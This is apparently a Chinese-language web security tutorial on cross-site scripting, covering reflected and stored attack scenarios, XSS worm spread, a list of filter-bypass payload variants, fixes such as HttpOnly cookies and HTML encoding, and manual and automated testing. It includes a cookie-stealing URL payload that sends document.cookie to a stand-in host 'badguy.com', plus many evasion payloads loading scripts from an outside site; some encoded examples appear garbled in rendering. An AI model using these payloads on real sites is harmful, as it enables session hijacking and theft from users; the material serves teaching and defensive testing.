XSS 攻击原理

XSS 攻击场景

Dom-Based XSS 漏洞 攻击过程如下

Tom 发现了Victim.com中的一个页面有XSS漏洞，

例如: http://victim.com/search.asp?term=apple

服务器中Search.asp 页面的代码大概如下

复制代码

<html>
　　<title></title>
　　<body>
　　　　Results  for  <%Reequest.QueryString("term")%>
　　　　...
　　</body>
</html>

复制代码

Tom 先建立一个网站http://badguy.com, 用来接收“偷”来的信息。

然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件，QQ)发给Monica

http://victim.com/search.asp?term=

<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL， 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下

Alex发现了网站A上有一个XSS 漏洞，该漏洞允许将攻击代码保存在数据库中，

Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。

其他人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其他信息将被Alex盗走。

Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户.

XSS Worm攻击原理剖析

XSS worm是针对站内所有可信任用户，具有会话的用户,远程攻击者可以利用这个渠道访问用户的Cookie和会话信息，通过跨站引用一个JS文件，创建XMLHttpRequest对象，实施xss。

假如有下面一个textbox

value1from是来自用户的输入，如果用户不是输入value1from,而是输入

"/><script>alert(document.cookie)</script><!-

那么就会变成

<input type="text" name="address1" value=""/>

<script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代码将会被执行

或者用户输入的是 “onfocus=”alert(document.cookie)

那么就会变成

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

事件被触发的时候嵌入的JavaScript代码将会被执行

攻击的威力，取决于用户输入了什么样的脚本

XSS不具有浏览器通用性。不同的浏览器对同一XSS的适用不一样。相比较而言，IE8和Firefox相对更安全，本身就对XSS攻击有更严格的过滤。而IE6的安全性一般，即使攻击者的代码有些“变形”，浏览器还是会“尽力而为”的解析。而其他的一些浏览器如opera，XSS安全处理可能做得更差。

本文基本上是在IE6的基础上给大家分析XSS的变形和绕过。以便大家有针对性的防护。作者参阅了互联网上一些XSS攻防实战的例子，汇总成此文。

一、具体内容

XSS的一般原始构造:

<script>alert("anyunix")</script>

上述构造方式由于太过直接而容易被过滤，实际上，针对不同站点的不同过滤机制，对原始构造的适当变形有时就能绕过不少对XSS的检测。

二、发展

1:很简单，大家都知道会把

<script>

过滤掉,却往往忽略了大小写:

<sCripT>alert("anyunix")</Script>

2: `这里写代码片

<IMG SRC=javascript:alert("anyunix")>

3：当简单的”javascript”形式也被彻底过滤后。我们发现很多对象支持“&#ASCII”的表示方法，

<img src=javascript:alert("anyunix")>

<img src=javascript:alert('anyunix')>

<img src=javascript:alert('anyunix')>

<img src=javascript:alert('anyunix')>

a可以写成a,a直至a也是可以执行的。

a也是可以写成=,=直至=的。

4:如果上述编码亦被还原过滤，可以填入空格、制表符、换行符等空白字符：

<IMG SRC="jav ascript:alert('anyunix');">

5:也可以嵌入编码过后的TAB键等,char09,char10,char13都可以被嵌入:

<IMG SRC="jav	ascript:alert('anyunix');">

<IMG SRC="jav
ascript:alert('anyunix');">

<IMG SRC="jav
ascript:alert('anyunix');">

6:当直接用“javascript”终于被彻底禁绝，我们还可以使用其他属性执行XSS。

<DIV STYLE="width:expression(alert('anyunix'));">

<IMG SRC='vbscript:msgbox("anyunix")'>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:然后，理所当然衍生了新的绕过方式和利用形式。

A):插入注释/…./做干扰

<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">

B):全角字符的干扰

<DIV STYLE="width:ｅｘpreｓsion(alert('anyunix'));">

C):“\”的干扰

<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:如果直接执行被完全过滤，那我们就利用事件来执行XSS

<img src="#"onerror=alert('anyunix')>

<img src=http://images.51cto.com/files/uploadimg/20130407/1014480.png"onmousemove=alert(163)>

<BODY ONLOAD=alert('anyunix')>

<isindex type=imagesrc=1onerror=alert('anyunix')>

9:flash可以用来执行XSS

<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也可以利用各种其他标签

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">

<TABLE BACKGROUND="javascript:alert('XSS')">

其他的一些用于混淆、干扰和绕过的bypass实例:

<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out

<IMG SRC=" javascript:alert('XSS');">

如上，就是一些比较常见和实用的XSS绕过方法。在实际的运用中，往往是多种方法结合起来。

更多更详尽的XSS测试脚本，可参见http://ha.ckers.org/xss.html建议参阅《OWASP测试指南》，对一些相关的web安全知识做全面的了解

XSS蠕虫之所以能在短时间内快速传播，是因为受害者的浏览器平台相近，其中IE、Firefox占九成，同时社交网络用户的好友群重叠率低，而SNS社交网站具备庞大的用户数量，所以容易成为XSS Worm攻击的主要目标。

XSS蠕虫通常使用了大量的Ajax技术。Ajax的作用就在于：无须刷新即可异步传输数据，经过服务器处理后，得到返回信息，再提示给用户。如此一来，使跨站蠕虫具有较强的传播性和隐蔽性，而且蔓延速度相当惊人，呈几何级发展。

一个完整的XSS Worm的攻击流程如下。

① 攻击者发现目标网站存在XSS漏洞，并且可以编写XSS蠕虫。

② 利用一个宿主（如博客空间）作为传播源头进行XSS攻击。

③ 当其他用户访问被感染的空间时，XSS蠕虫执行以下操作。

判断用户是否登录，如果已登录就执行下一步；如果没登录则执行其他操作。

继续判断该用户是否被感染，如果没有就将其感染；如果已感染则跳过。

图5-13所示的流程图描述了XSS Worm的攻击过程。

XSS 漏洞修复

原则：　不相信客户输入的数据

注意: 攻击代码不一定在中

将重要的cookie标记为http only,   这样的话Javascript 中的document.cookie语句就不能获取到cookie了.
只允许用户输入我们期望的数据。 例如：　年龄的textbox中，只允许用户输入数字。 而数字之外的字符都过滤掉。
对数据进行Html Encode 处理
过滤或移除特殊的Html标签， 例如: <script>, <iframe> ,  < for <, > for >, " for
过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。

如何测试XSS漏洞

方法一： 查看代码，查找关键的变量, 客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单，以及cookie. 例如在ASP的程序中，通过Request对象获取客户端的变量

<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>

假如变量没有经过htmlEncode处理， 那么这个变量就存在一个XSS漏洞

方法二：　准备测试脚本，

"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"onclick="alert(document.cookie)

在网页中的Textbox或者其他能输入数据的地方，输入这些测试脚本， 看能不能弹出对话框，能弹出的话说明存在XSS漏洞

在URL中查看有那些变量通过URL把值传给Web服务器， 把这些变量的值退换成我们的测试的脚本。 然后看我们的脚本是否能执行

方法三: 自动化测试XSS漏洞

现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单，只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中，我们的XSS测试脚本是否已经注入进去了。